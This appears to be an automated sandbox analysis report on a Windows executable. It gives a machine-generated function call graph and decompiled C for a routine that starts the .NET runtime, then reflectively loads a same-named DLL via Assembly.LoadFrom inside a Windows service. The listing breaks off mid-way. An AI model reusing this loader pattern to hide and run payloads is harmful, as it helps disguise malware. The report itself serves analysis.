8686->8687 8688 3f29e1 __cftoe_l 9 API calls 8687->8688 8690 3fa303 8688->8690 8691 3fa358 8689->8691 8692 3f1b07 __cftoe_l 6 API calls 8690->8692 8691->8690 8693 3fa16d __cftoe2_l 58 API calls 8691->8693 8694 3fa388 8692->8694 8693->8690 8694->8623 8696 3faeb8 ___dtold 8695->8696 8723 3fb07c 8696->8723 8699 3f58c2 __setenvp 58 API calls 8700 3faef3 8699->8700 8701 3faefa 8700->8701 8702 3faf10 8700->8702 8703 3f1b07 __cftoe_l 6 API calls 8701->8703 8704 3f29f1 __invoke_watson 8 API calls 8702->8704 8706 3fa4a6 8703->8706 8705 3faf1c 8704->8705 8706->8627 8706->8628 8708 3fad3f 8707->8708 8709 3fad29 8707->8709 8708->8709 8711 3fad45 8708->8711 8710 3f2218 __cftoe_l 58 API calls 8709->8710 8712 3fad2e 8710->8712 8714 3f2218 __cftoe_l 58 API calls 8711->8714 8715 3fad38 _memmove _strlen 8711->8715 8713 3f29e1 __cftoe_l 9 API calls 8712->8713 8713->8715 8714->8712 8715->8638 8717 3f4f96 _LocaleUpdate::_LocaleUpdate 58 API calls 8716->8717 8718 3fa3a9 8717->8718 8719 3f2218 __cftoe_l 58 API calls 8718->8719 8722 3fa3c5 _memset __shift 8718->8722 8720 3fa3bb 8719->8720 8721 3f29e1 __cftoe_l 9 API calls 8720->8721 8721->8722 8722->8639 8726 3fb0d1 8723->8726 8724 3fb143 8727 3f58c2 __setenvp 58 API calls 8724->8727 8725 3f1b07 __cftoe_l 6 API calls 8728 3faed3 8725->8728 8726->8724 8729 3fb15c 8726->8729 8730 3fb0e3 8726->8730 8727->8730 8728->8699 8732 3f58c2 __setenvp 58 API calls 8729->8732 8731 3fba18 8730->8731 8735 3fb0f4 8730->8735 8733 3f29f1 __invoke_watson 8 API calls 8731->8733 8732->8730 8734 3fba4f 8733->8734 8735->8725 8737 3f4f96 _LocaleUpdate::_LocaleUpdate 58 API calls 8736->8737 8738 3fa180 8737->8738 8739 3fa18d 8738->8739 8740 3fa196 8738->8740 8741 3f2218 __cftoe_l 58 API calls 8739->8741 8743 3fa1ab 8740->8743 8746 3fa1bf __shift 8740->8746 8742 3fa192 8741->8742 8745 3f29e1 __cftoe_l 9 API calls 8742->8745 8744 3f2218 __cftoe_l 58 API calls 8743->8744 8744->8742 8751 3fa1ba _memmove 8745->8751 8747 3f58c2 __setenvp 58 API calls 8746->8747 8748 3fa236 8747->8748 8749 3f29f1 __invoke_watson 8 API calls 8748->8749 8748->8751 8750 3fa2bd 8749->8750 8752 3fae8f __fltout2 58 API calls 8750->8752 8751->8658 8753 3fa2f0 8752->8753 8754 3fa307 8753->8754 8755 3fa2f7 8753->8755 8756 3fa30e 8754->8756 8757 3fa318 8754->8757 8758 3f2218 __cftoe_l 58 API calls 8755->8758 8759 3f2218 __cftoe_l 58 API calls 8756->8759 8762 3fad17 __fptostr 58 API calls 8757->8762 8760 3fa2fc 8758->8760 8759->8760 8761 3f29e1 __cftoe_l 9 API calls 8760->8761 8763 3fa303 8761->8763 8764 3fa358 8762->8764 8765 3f1b07 __cftoe_l 6 API calls 8763->8765 8764->8763 8766 3fa16d __cftoe2_l 58 API calls 8764->8766 8767 3fa388 8765->8767 8766->8763 8767->8658 8769 3fa2be __cftoe_l 58 API calls 8768->8769 8770 3fa168 8769->8770 8770->8677 7880 3fc2ca 7883 3fcfcd 7880->7883 7884 3f2e9c ___InternalCxxFrameHandler 58 API calls 7883->7884 7885 3fcfd8 7884->7885 7886 3fd019 7885->7886 7887 3fd03a 7885->7887 7890 3fc2f0 7885->7890 7886->7890 7891 3fcef4 7886->7891 7887->7890 7901 3fc6f0 7887->7901 7892 3fcf00 __initptd 7891->7892 7893 3f2e9c ___InternalCxxFrameHandler 58 API calls 7892->7893 7898 3fcf20 __CallSettingFrame@12 7893->7898 7894 3fcf8e 7971 3fcfb3 7894->7971 7898->7894 7959 3f4cb0 7898->7959 7899 3fcfa4 __initptd 7899->7890 7900 3f4cb0 IsInExceptionSpec 63 API calls 7900->7899 7902 3fc710 7901->7902 7903 3f4cb0 IsInExceptionSpec 63 API calls 7902->7903 7905 3fc72b 7902->7905 7903->7905 7904 3fc9f4 7906 3fca18 7904->7906 7908 3fca01 7904->7908 7958 3fc815 type_info::operator== 7904->7958 7905->7904 7910 3f2e9c ___InternalCxxFrameHandler 58 API calls 7905->7910 7912 3fc80f 7905->7912 7907 3f2e9c ___InternalCxxFrameHandler 58 API calls 7906->7907 7909 3fca20 7907->7909 8000 3fca8d 7908->8000 7914 3fca2d 7909->7914 7918 3f4cb0 IsInExceptionSpec 63 API calls 7909->7918 7915 3fc771 7910->7915 7911 3f4ce8 IsInExceptionSpec 62 API calls 7916 3fca39 ___DestructExceptionObject 7911->7916 7912->7904 7917 3fc891 7912->7917 7912->7958 7914->7890 7915->7914 7920 3f2e9c ___InternalCxxFrameHandler 58 API calls 7915->7920 8015 3f480e 7916->8015 7924 3fc98a ___DestructExceptionObject 7917->7924 7984 3fc122 7917->7984 7918->7914 7921 3fc782 7920->7921 7923 3f2e9c ___InternalCxxFrameHandler 58 API calls 7921->7923 7932 3fc78d FindHandler 7923->7932 7924->7906 7927 3fcba9 IsInExceptionSpec 63 API calls 7924->7927 7926 3f496e __CxxThrowException@8 RaiseException 7928 3fc9df 7926->7928 7929 3fc9bf 7927->7929 8018 3fc1d2 RtlUnwind 7928->8018 7929->7906 7930 3fc9c5 7929->7930 7934 3f2e9c ___InternalCxxFrameHandler 58 API calls 7930->7934 7936 3f4cb0 IsInExceptionSpec 63 API calls 7932->7936 7940 3fc7ad 7932->7940 7933 3fc7e0 7939 3f2e9c ___InternalCxxFrameHandler 58 API calls 7933->7939 7937 3fc9ca 7934->7937 7935 3fca73 7938 3fcef4 ___FrameUnwindToState 63 API calls 7935->7938 7936->7940 7941 3f2e9c ___InternalCxxFrameHandler 58 API calls 7937->7941 7942 3fca81 7938->7942 7943 3fc7e5 7939->7943 7940->7933 7949 3f4cb0 IsInExceptionSpec 63 API calls 7940->7949 7944 3fc9cf 7941->7944 8019 3fc5e8 7942->8019 7943->7912 7950 3f2e9c ___InternalCxxFrameHandler 58 API calls 7943->7950 7947 3f2e9c ___InternalCxxFrameHandler 58 API calls 7944->7947 7946 3fc8ae ___TypeMatch 7946->7924 7990 3fc628 7946->7990 7951 3fc9d4 7947->7951 7949->7933 7952 3fc7f2 7950->7952 7954 3f2e9c ___InternalCxxFrameHandler 58 API calls 7951->7954 7955 3f2e9c ___InternalCxxFrameHandler 58 API calls 7952->7955 7954->7928 7956 3fc800 7955->7956 7977 3fcba9 7956->7977 7958->7911 7958->7916 7976 3f2690 7959->7976 7961 3f4cbc DecodePointer 7962 3f4ccc 7961->7962 7963 3f4ce8 IsInExceptionSpec 62 API calls 7962->7963 7964 3f4ce7 __initptd 7963->7964 7965 3f2e9c ___InternalCxxFrameHandler 58 API calls 7964->7965 7966 3f4cf9 7965->7966 7967 3f6273 _abort 62 API calls 7966->7967 7968 3f4d1b 7967->7968 7969 3f2e9c ___InternalCxxFrameHandler 58 API calls 7968->7969 7970 3f4d21 7969->7970 7972 3f2e9c ___InternalCxxFrameHandler 58 API calls 7971->7972 7973 3fcfb8 7972->7973 7974 3fcf9a 7973->7974 7975 3f2e9c ___InternalCxxFrameHandler 58 API calls 7973->7975 7974->7899 7974->7900 7975->7974 7976->7961 7978 3fcbb8 ___TypeMatch 7977->7978 7979 3fcc26 7977->7979 7978->7912 7980 3f4cb0 IsInExceptionSpec 63 API calls 7979->7980 7981 3fcc2b 7980->7981 7982 3f4ce8 IsInExceptionSpec 62 API calls 7981->7982 7983 3fcc30 7982->7983 7985 3fc175 7984->7985 7989 3fc142 7984->7989 7986 3fc191 7985->7986 7987 3f4cb0 IsInExceptionSpec 63 API calls 7985->7987 7986->7946 7987->7986 7988 3f4cb0 IsInExceptionSpec 63 API calls 7988->7989 7989->7985 7989->7988 7991 3fc635 7990->7991 7992 3fc644 7990->7992 8029 3fcc56 7991->8029 8033 3fc1d2 RtlUnwind 7992->8033 7995 3fc65b 7996 3fcef4 ___FrameUnwindToState 63 API calls 7995->7996 7997 3fc66d 7996->7997 8034 3fc422 7997->8034 7999 3fc691 FindHandlerForForeignException 7999->7946 8001 3fcaa2 8000->8001 8010 3fcba2 8000->8010 8002 3f2e9c ___InternalCxxFrameHandler 58 API calls 8001->8002 8003 3fcaa9 8002->8003 8004 3fcaf2 8003->8004 8005 3fcab5 EncodePointer 8003->8005 8007 3fcb08 8004->8007 8009 3f4cb0 IsInExceptionSpec 63 API calls 8004->8009 8004->8010 8006 3f2e9c ___InternalCxxFrameHandler 58 API calls 8005->8006 8011 3fcac4 8006->8011 8008 3fc122 _GetRangeOfTrysToCheck 63 API calls 8007->8008 8013 3fcb1c 8008->8013 8009->8007 8010->7906 8011->8004 8077 3fc04b 8011->8077 8013->8010 8014 3fc628 FindHandlerForForeignException 64 API calls 8013->8014 8014->8013 8081 3f48d4 8015->8081 8018->7935 8020 3fc5f4 __EH_prolog3_catch 8019->8020 8021 3f2e9c ___InternalCxxFrameHandler 58 API calls 8020->8021 8022 3fc5f9 8021->8022 8023 3fc607 8022->8023 8024 3f4cb0 IsInExceptionSpec 63 API calls 8022->8024 8025 3f2e9c ___InternalCxxFrameHandler 58 API calls 8023->8025 8024->8023 8026 3fc615 8025->8026 8027 3f496e __CxxThrowException@8 RaiseException 8026->8027 8028 3fc627 8027->8028 8030 3fcc62 __initptd 8029->8030 8048 3fcce4 8030->8048 8032 3fcc8d ___DestructExceptionObject __initptd ___AdjustPointer 8032->7992 8033->7995 8035 3fc42e __initptd 8034->8035 8052 3fc227 8035->8052 8038 3f2e9c ___InternalCxxFrameHandler 58 API calls 8039 3fc45b 8038->8039 8040 3f2e9c ___InternalCxxFrameHandler 58 API calls 8039->8040 8041 3fc469 8040->8041 8042 3f2e9c ___InternalCxxFrameHandler 58 API calls 8041->8042 8043 3fc477 8042->8043 8044 3f2e9c ___InternalCxxFrameHandler 58 API calls 8043->8044 8045 3fc482 _CallCatchBlock2 8044->8045 8057 3fc569 8045->8057 8047 3fc55b __initptd 8047->7999 8049 3fccf0 FindHandler __initptd 8048->8049 8050 3f4cb0 IsInExceptionSpec 63 API calls 8049->8050 8051 3fcd6b __initptd ___AdjustPointer _memmove 8049->8051 8050->8051 8051->8032 8053 3f2e9c ___InternalCxxFrameHandler 58 API calls 8052->8053 8054 3fc238 8053->8054 8055 3f2e9c ___InternalCxxFrameHandler 58 API calls 8054->8055 8056 3fc246 8055->8056 8056->8038 8066 3fc251 8057->8066 8060 3f2e9c ___InternalCxxFrameHandler 58 API calls 8061 3fc57d 8060->8061 8062 3f2e9c ___InternalCxxFrameHandler 58 API calls 8061->8062 8063 3fc58b 8062->8063 8065 3fc5d2 ___DestructExceptionObject 8063->8065 8074 3fc2a1 8063->8074 8065->8047 8067 3f2e9c ___InternalCxxFrameHandler 58 API calls 8066->8067 8068 3fc25a 8067->8068 8069 3fc276 8068->8069 8070 3fc265 8068->8070 8071 3f2e9c ___InternalCxxFrameHandler 58 API calls 8069->8071 8072 3f2e9c ___InternalCxxFrameHandler 58 API calls 8070->8072 8073 3fc26a 8071->8073 8072->8073 8073->8060 8075 3f2e9c ___InternalCxxFrameHandler 58 API calls 8074->8075 8076 3fc2a9 8075->8076 8076->8065 8078 3fc06d 8077->8078 8080 3fc05b 8077->8080 8079 3f2e9c ___InternalCxxFrameHandler 58 API calls 8078->8079 8079->8080 8080->8004 8082 3f48e0 _strlen 8081->8082 8084 3f482c 8081->8084 8083 3f477c _malloc 58 API calls 8082->8083 8085 3f48f2 8083->8085 8084->7926 8085->8084 8086 3f58c2 __setenvp 58 API calls 8085->8086 8086->8084 8087 3fa6c9 8090 3fa6e1 8087->8090 8091 3fa70b 8090->8091 8092 3fa6f2 8090->8092 8105 3f880d 8091->8105 8096 3f877f 8092->8096 8095 3fa6dc 8097 3f4f96 _LocaleUpdate::_LocaleUpdate 58 API calls 8096->8097 8098 3f87a3 8097->8098 8108 3f95a4 8098->8108 8103 3f1b07 __cftoe_l 6 API calls 8104 3f8809 8103->8104 8104->8095 8120 3f86db 8105->8120 8109 3f95ec 8108->8109 8115 3f95fc ___mtold12 8108->8115 8110 3f2218 __cftoe_l 58 API calls 8109->8110 8111 3f95f1 8110->8111 8112 3f29e1 __cftoe_l 9 API calls 8111->8112 8112->8115 8113 3f1b07 __cftoe_l 6 API calls 8114 3f87bb 8113->8114 8116 3f8ac0 8114->8116 8115->8113 8119 3f8b18 8116->8119 8117 3f1b07 __cftoe_l 6 API calls 8118 3f87c8 8117->8118 8118->8103 8119->8117 8121 3f4f96 _LocaleUpdate::_LocaleUpdate 58 API calls 8120->8121 8122 3f8708 8121->8122 8123 3f95a4 ___strgtold12_l 58 API calls 8122->8123 8124 3f8720 8123->8124 8129 3f9032 8124->8129 8127 3f1b07 __cftoe_l 6 API calls 8128 3f877b 8127->8128 8128->8095 8132 3f908a 8129->8132 8130 3f1b07 __cftoe_l 6 API calls 8131 3f873d 8130->8131 8131->8127 8132->8130 8771 3f2148 8774 3f484e 8771->8774 8777 3f487c 8774->8777 8778 3f488a 8777->8778 8779 3f2156 8777->8779 8780 3f4912 std::exception::_Tidy 58 API calls 8778->8780 8781 3f488f 8780->8781 8781->8779 8782 3f48d4 std::exception::_Copy_str 58 API calls 8781->8782 8782->8779 7668 3f5d05 7669 3f5d12 7668->7669 7670 3f25b3 __calloc_crt 58 API calls 7669->7670 7671 3f5d2c 7670->7671 7672 3f5d45 7671->7672 7673 3f25b3 __calloc_crt 58 API calls 7671->7673 7673->7672 7721 3f1005 7726 3f1a59 7721->7726 7724 3f1c82 __cinit 67 API calls 7725 3f1014 7724->7725 7727 3f1a61 7726->7727 7733 3f1040 InitializeCriticalSectionAndSpinCount 7727->7733 7730 3f1a8c IsDebuggerPresent 7731 3f1a96 OutputDebugStringW 7730->7731 7732 3f100a 7730->7732 7731->7732 7732->7724 7734 3f104d GetLastError 7733->7734 7735 3f1057 7733->7735 7734->7735 7735->7730 7735->7732 8783 3fbf45 8784 3f1b07 __cftoe_l 6 API calls 8783->8784 8785 3fbf59 8784->8785 8786 3fcfcd ___InternalCxxFrameHandler 66 API calls 8785->8786 8791 3fbf64 8785->8791 8787 3fbf9c 8786->8787 8788 3fbfb3 8787->8788 8792 3fc1d2 RtlUnwind 8787->8792 8790 3fc04b _CallSETranslator 58 API calls 8788->8790 8790->8791 8792->8788 8133 3fc4c1 8134 3f2e9c ___InternalCxxFrameHandler 58 API calls 8133->8134 8135 3fc4c9 8134->8135 8136 3fcef4 ___FrameUnwindToState 63 API calls 8135->8136 8137 3fc53c 8136->8137 8138 3fc569 CallCatchBlock 58 API calls 8137->8138 8139 3fc55b __initptd 8138->8139 7674 3f1700 7675 3f1760 GetCurrentProcessId 7674->7675 7686 3f1c97 7675->7686 7679 3f17a3 RegisterServiceCtrlHandlerExW SetServiceStatus VariantInit 7680 3f1160 87 API calls 7679->7680 7681 3f181b SetServiceStatus 7680->7681 7682 3f1840 CloseHandle 7681->7682 7682->7682 7683 3f184c VariantClear 7682->7683 7684 3f1b07 __cftoe_l 6 API calls 7683->7684 7685 3f1876 7684->7685 7687 3f1ca3 7686->7687 7690 3f1cc0 7687->7690 7691 3f1ccb 7690->7691 7692 3f1ce1 7690->7692 7693 3f2218 __cftoe_l 58 API calls 7691->7693 7694 3f1ce9 7692->7694 7697 3f1d09 7692->7697 7698 3f1d12 7692->7698 7695 3f1cd0 7693->7695 7696 3f2218 __cftoe_l 58 API calls 7694->7696 7699 3f29e1 __cftoe_l 9 API calls 7695->7699 7700 3f1cee 7696->7700 7701 3f2218 __cftoe_l 58 API calls 7697->7701 7698->7694 7704 3f1d1f 7698->7704 7703 3f1774 CreateEventW 7699->7703 7702 3f29e1 __cftoe_l 9 API calls 7700->7702 7701->7700 7702->7703 7703->7675 7703->7679 7704->7703 7705 3f2218 __cftoe_l 58 API calls 7704->7705 7705->7700 7736 3f5800 7737 3f5820 @_EH4_CallFilterFunc@8 7736->7737 7738 3f5812 7736->7738 7739 3f1b07 __cftoe_l 6 API calls 7738->7739 7739->7737 7839 3f8a80 7840 3f8a8a 7839->7840 7841 3f8a96 7839->7841 7840->7841 7842 3f8a8f CloseHandle 7840->7842 7842->7841

                                                                          Executed Functions

                                                                          Function 003F1160, Relevance: 52.9, APIs: 24, Strings: 6, Instructions: 365memorylibraryloaderCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 0 3f1160-3f11c6 LoadLibraryW GetProcAddress 1 3f126f-3f128c CorBindToRuntimeEx 0->1 2 3f11cc-3f11f5 0->2 3 3f1292-3f1349 SysAllocString 1->3 5 3f1257-3f125d 2->5 6 3f11f7-3f1224 2->6 20 3f134b-3f1350 call 3f1020 3->20 21 3f1355-3f13bd SysFreeString GetModuleHandleW GetModuleFileNameW PathRemoveExtensionW PathFindFileNameW StrCpyW 3->21 8 3f125f-3f1261 5->8 9 3f1265-3f126d 5->9 12 3f1226-3f1239 6->12 13 3f1243-3f1249 6->13 8->9 9->1 9->3 17 3f123d 12->17 15 3f124b-3f124d 13->15 16 3f1251 13->16 15->16 16->5 17->13 20->21 24 3f13c0-3f13c9 21->24 24->24 25 3f13cb-3f1400 StrCpyW SafeArrayCreateVector call 3f1b16 24->25 28 3f140a 25->28 29 3f1402-3f1408 25->29 30 3f140c-3f1426 VariantClear 28->30 29->30 31 3f142e-3f144f SysAllocString 30->31 32 3f1428-3f1429 call 3f1020 30->32 34 3f1471-3f14f1 SafeArrayPutElement VariantClear VariantInit * 2 SysAllocString 31->34 35 3f1451-3f146c call 3f1020 31->35 32->31 36 3f14fd-3f1554 SysFreeString VariantClear 34->36 37 3f14f3-3f14f8 call 3f1020 34->37 35->34 41 3f155a-3f158b SysAllocString 36->41 42 3f1604-3f1619 VariantClear 36->42 37->36 45 3f158d-3f1592 call 3f1020 41->45 46 3f1597-3f15c8 SysFreeString call 3f10a0 41->46 43 3f161b-3f161d 42->43 44 3f1621-3f162d 42->44 43->44 47 3f162f-3f1631 44->47 48 3f1635-3f1641 44->48 45->46 58 3f15cd-3f15e2 46->58 47->48 50 3f1649-3f1655 48->50 51 3f1643-3f1645 48->51 54 3f165d-3f1669 50->54 55 3f1657-3f1659 50->55 51->50 56 3f166b-3f166d 54->56 57 3f1671-3f1680 54->57 55->54 56->57 59 3f1688-3f16a4 call 3f1b07 57->59 60 3f1682-3f1684 57->60 61 3f15ea-3f15f0 58->61 62 3f15e4-3f15e6 58->62 60->59 63 3f15f8-3f15fe 61->63 64 3f15f2-3f15f4 61->64 62->61 63->42 64->63
                                                                          C-Code - Quality: 43%
                                                                          			E003F1160(void* __ebx, short __ecx, intOrPtr _a4) {
				WCHAR* _v8;
				char _v16;
				signed int _v24;
				short _v544;
				short _v1064;
				WCHAR* _v1068;
				WCHAR* _v1072;
				WCHAR* _v1076;
				WCHAR* _v1080;
				WCHAR* _v1084;
				WCHAR* _v1088;
				WCHAR* _v1092;
				WCHAR* _v1096;
				WCHAR* _v1100;
				intOrPtr _v1112;
				char _v1120;
				intOrPtr* _v1124;
				intOrPtr _v1128;
				short _v1132;
				intOrPtr* _v1144;
				char _v1152;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t132;
				signed int _t133;
				_Unknown_base(*)()* _t137;
				intOrPtr* _t139;
				intOrPtr* _t141;
				intOrPtr* _t143;
				intOrPtr* _t145;
				intOrPtr* _t147;
				WCHAR* _t148;
				intOrPtr _t158;
				WCHAR* _t161;
				WCHAR* _t167;
				intOrPtr* _t175;
				WCHAR* _t178;
				WCHAR* _t183;
				WCHAR* _t184;
				WCHAR* _t185;
				WCHAR* _t186;
				WCHAR* _t187;
				WCHAR* _t188;
				WCHAR* _t197;
				WCHAR* _t200;
				intOrPtr* _t211;
				intOrPtr* _t214;
				void* _t217;
				intOrPtr* _t226;
				WCHAR* _t242;
				void* _t252;
				intOrPtr* _t257;
				intOrPtr* _t258;
				void* _t259;
				WCHAR* _t260;
				WCHAR* _t262;
				WCHAR** _t264;
				intOrPtr* _t265;
				intOrPtr* _t266;
				void* _t268;
				intOrPtr* _t269;
				signed int _t270;

				_t217 = __ebx;
				_push(0xffffffff);
				_push(E003FD235);
				_push( *[fs:0x0]);
				_t132 =  *0x404000; // 0xa8642a1f
				_t133 = _t132 ^ _t270;
				_v24 = _t133;
				_push(_t133);
				 *[fs:0x0] =  &_v16;
				_v1132 = __ecx;
				_v1128 = _a4;
				_t137 = GetProcAddress(LoadLibraryW(L"mscoree.dll"), "CLRCreateInstance");
				_v1076 = 0;
				_v8 = 0;
				if(_t137 == 0) {
					L10:
					__imp__CorBindToRuntimeEx(0, 0, 0, 0x402734, 0x402714,  &_v1076);
					_t139 = _v1076;
				} else {
					_v1068 = 0;
					_v8 = 1;
					 *_t137(0x402724, 0x402764,  &_v1068); // executed
					_t211 = _v1068;
					if(_t211 != 0) {
						_v1072 = 0;
						_v8 = 2;
						 *((intOrPtr*)( *_t211 + 0xc))(_t211, L"v4.0.30319", 0x402744,  &_v1072);
						_t214 = _v1072;
						if(_t214 != 0) {
							 *((intOrPtr*)( *_t214 + 0x24))(_t214, 0x402734, 0x402714,  &_v1076);
							_t214 = _v1072;
						}
						_v8 = 1;
						if(_t214 != 0) {
							 *((intOrPtr*)( *_t214 + 8))(_t214);
						}
						_t211 = _v1068;
					}
					_v8 = 0;
					if(_t211 != 0) {
						 *((intOrPtr*)( *_t211 + 8))(_t211);
					}
					_t139 = _v1076;
					if(_t139 == 0) {
						goto L10;
					}
				}
				_v1080 = 0;
				_v8 = 3;
				 *((intOrPtr*)( *_t139 + 0x28))(_t139);
				_t141 = _v1076;
				 *((intOrPtr*)( *_t141 + 0x34))(_t141,  &_v1080);
				_v1092 = 0;
				_v8 = 4;
				_t143 = _v1080;
				 *((intOrPtr*)( *_t143))(_t143, 0x402754,  &_v1092);
				_v1088 = 0;
				_v8 = 5;
				_t145 = _v1092;
				 *((intOrPtr*)( *_t145 + 0x28))(_t145,  &_v1088);
				_v1100 = 0;
				_v8 = 6;
				_t147 = _v1088;
				_t223 =  *_t147; // executed
				_t148 =  *((intOrPtr*)( *_t147 + 0x50))(_t147,  &_v1100);
				_v1096 = 0;
				_v8 = 7;
				_t257 = _v1100;
				__imp__#2(L"System.Reflection.Assembly");
				_t262 = _t148;
				_v1072 = _t262;
				if(_t262 == 0) {
					E003F1020(_t223, 0x8007000e);
				}
				_v8 = 8;
				 *((intOrPtr*)( *_t257 + 0x44))(_t257, _t262,  &_v1096);
				_v8 = 7;
				__imp__#6(_t262);
				GetModuleFileNameW(GetModuleHandleW(0),  &_v544, 0x104);
				PathRemoveExtensionW( &_v544);
				StrCpyW( &_v1064, PathFindFileNameW( &_v544));
				_t226 =  &_v544;
				_t252 = _t226 + 2;
				do {
					_t158 =  *_t226;
					_t226 = _t226 + 2;
					_t283 = _t158;
				} while (_t158 != 0);
				_t228 = _t226 - _t252 >> 1;
				_t161 = StrCpyW( &(( &_v544)[_t226 - _t252 >> 1]), L".dll");
				__imp__#411(0xc, 0, 1);
				_v1072 = _t161;
				_t264 = E003F1B16(_t217, _t252, _t257, _t283, 4);
				if(_t264 == 0) {
					_t264 = 0;
					__eflags = 0;
				} else {
					 *_t264 = 0;
				}
				_t258 = __imp__#9;
				_v1120 = 0;
				_push( &_v1120);
				if( *_t258() < 0) {
					E003F1020(_t228, _t165);
				}
				_v1120 = 8;
				_t167 =  &_v544;
				__imp__#2(_t167);
				_v1112 = _t167;
				if(_t167 == 0) {
					_v1112 = 0x8007000e;
					_v1120 = 0xa;
					E003F1020(_t228, 0x8007000e);
				}
				__imp__#26(_v1072, _t264,  &_v1120);
				 *_t258( &_v1120);
				_t265 = __imp__#8;
				asm("xorps xmm0, xmm0");
				asm("movdqu [ebp-0x47c], xmm0");
				 *_t265( &_v1152);
				asm("xorps xmm0, xmm0");
				_v1068 = _v1096;
				asm("movdqu [ebp-0x45c], xmm0");
				_t175 =  *_t265( &_v1120);
				_v8 = 0xa;
				asm("movdqu xmm0, [ebp-0x45c]");
				asm("movdqu [ebp-0x48c], xmm0");
				__imp__#2(L"LoadFrom");
				_t266 = _t175;
				_v1124 = _t266;
				if(_t266 == 0) {
					E003F1020(_t228, 0x8007000e);
				}
				_v8 = 0xb;
				_t253 = _v1068;
				asm("movdqu xmm0, [ebp-0x48c]");
				_t229 =  *_t253;
				asm("movdqu [eax], xmm0"); // executed
				_t178 =  *((intOrPtr*)( *_t253 + 0xe4))(_t253, _t266, 0x118, 0, _v1072,  &_v1152);
				_v1068 = _t178;
				__imp__#6(_t266);
				 *_t258( &_v1120);
				if(_v1068 >= 0) {
					_t269 = _v1144;
					_v1124 = _t269;
					_v1084 = 0;
					_t197 =  &_v1064;
					_v8 = 0xd;
					__imp__#2(_t197);
					_t260 = _t197;
					_v1072 = _t260;
					if(_t260 == 0) {
						E003F1020(_t229, 0x8007000e);
					}
					_v8 = 0xe;
					 *((intOrPtr*)( *_t269 + 0x44))(_t269, _t260,  &_v1084);
					_v8 = 0xd;
					__imp__#6(_t260);
					_t253 = _v1132;
					_t200 = E003F10A0(_v1084, _v1132, 0, _v1128); // executed
					_v8 = 0xc;
					_t242 = _v1084;
					_v1068 = _t200;
					if(_t242 != 0) {
						_t253 =  *_t242;
						 *((intOrPtr*)( *_t242 + 8))(_t242);
					}
					_v8 = 9;
					if(_t269 != 0) {
						 *((intOrPtr*)( *_t269 + 8))(_t269);
					}
					_t258 = __imp__#9;
				}
				 *_t258( &_v1152);
				_v8 = 6;
				_t183 = _v1096;
				if(_t183 != 0) {
					 *((intOrPtr*)( *_t183 + 8))(_t183);
				}
				_v8 = 5;
				_t184 = _v1100;
				if(_t184 != 0) {
					 *((intOrPtr*)( *_t184 + 8))(_t184);
				}
				_v8 = 4;
				_t185 = _v1088;
				if(_t185 != 0) {
					 *((intOrPtr*)( *_t185 + 8))(_t185);
				}
				_v8 = 3;
				_t186 = _v1092;
				if(_t186 != 0) {
					 *((intOrPtr*)( *_t186 + 8))(_t186);
				}
				_v8 = 0;
				_t187 = _v1080;
				if(_t187 != 0) {
					 *((intOrPtr*)( *_t187 + 8))(_t187);
				}
				_v8 = 0xffffffff;
				_t188 = _v1076;
				if(_t188 != 0) {
					 *((intOrPtr*)( *_t188 + 8))(_t188);
				}
				 *[fs:0x0] = _v16;
				_pop(_t259);
				_pop(_t268);
				return E003F1B07(_t217, _v24 ^ _t270, _t253, _t259, _t268);
			}


































































                                                                          0x003f1160
                                                                          0x003f1163
                                                                          0x003f1165
                                                                          0x003f1170
                                                                          0x003f1177
                                                                          0x003f117c
                                                                          0x003f117e
                                                                          0x003f1183
                                                                          0x003f1187
                                                                          0x003f118d
                                                                          0x003f119b
                                                                          0x003f11ad
                                                                          0x003f11b3
                                                                          0x003f11bd
                                                                          0x003f11c6
                                                                          0x003f126f
                                                                          0x003f1286
                                                                          0x003f128c
                                                                          0x003f11cc
                                                                          0x003f11cc
                                                                          0x003f11dc
                                                                          0x003f11eb
                                                                          0x003f11ed
                                                                          0x003f11f5
                                                                          0x003f11f7
                                                                          0x003f1207
                                                                          0x003f1219
                                                                          0x003f121c
                                                                          0x003f1224
                                                                          0x003f123a
                                                                          0x003f123d
                                                                          0x003f123d
                                                                          0x003f1243
                                                                          0x003f1249
                                                                          0x003f124e
                                                                          0x003f124e
                                                                          0x003f1251
                                                                          0x003f1251
                                                                          0x003f1257
                                                                          0x003f125d
                                                                          0x003f1262
                                                                          0x003f1262
                                                                          0x003f1265
                                                                          0x003f126d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x003f126d
                                                                          0x003f1292
                                                                          0x003f129c
                                                                          0x003f12a3
                                                                          0x003f12a6
                                                                          0x003f12b6
                                                                          0x003f12b9
                                                                          0x003f12c3
                                                                          0x003f12cd
                                                                          0x003f12dc
                                                                          0x003f12de
                                                                          0x003f12e8
                                                                          0x003f12f2
                                                                          0x003f12fc
                                                                          0x003f12ff
                                                                          0x003f1309
                                                                          0x003f1313
                                                                          0x003f131b
                                                                          0x003f131d
                                                                          0x003f1320
                                                                          0x003f132a
                                                                          0x003f132e
                                                                          0x003f1339
                                                                          0x003f133f
                                                                          0x003f1341
                                                                          0x003f1349
                                                                          0x003f1350
                                                                          0x003f1350
                                                                          0x003f135b
                                                                          0x003f1364
                                                                          0x003f1368
                                                                          0x003f136c
                                                                          0x003f1387
                                                                          0x003f1394
                                                                          0x003f13b5
                                                                          0x003f13b7
                                                                          0x003f13bd
                                                                          0x003f13c0
                                                                          0x003f13c0
                                                                          0x003f13c3
                                                                          0x003f13c6
                                                                          0x003f13c6
                                                                          0x003f13d3
                                                                          0x003f13de
                                                                          0x003f13e6
                                                                          0x003f13ee
                                                                          0x003f13f9
                                                                          0x003f1400
                                                                          0x003f140a
                                                                          0x003f140a
                                                                          0x003f1402
                                                                          0x003f1402
                                                                          0x003f1402
                                                                          0x003f140c
                                                                          0x003f1414
                                                                          0x003f1421
                                                                          0x003f1426
                                                                          0x003f1429
                                                                          0x003f1429
                                                                          0x003f1433
                                                                          0x003f143a
                                                                          0x003f1441
                                                                          0x003f1447
                                                                          0x003f144f
                                                                          0x003f1456
                                                                          0x003f1465
                                                                          0x003f146c
                                                                          0x003f146c
                                                                          0x003f147f
                                                                          0x003f148c
                                                                          0x003f148e
                                                                          0x003f149a
                                                                          0x003f149e
                                                                          0x003f14a6
                                                                          0x003f14ae
                                                                          0x003f14b1
                                                                          0x003f14be
                                                                          0x003f14c6
                                                                          0x003f14c8
                                                                          0x003f14cc
                                                                          0x003f14d9
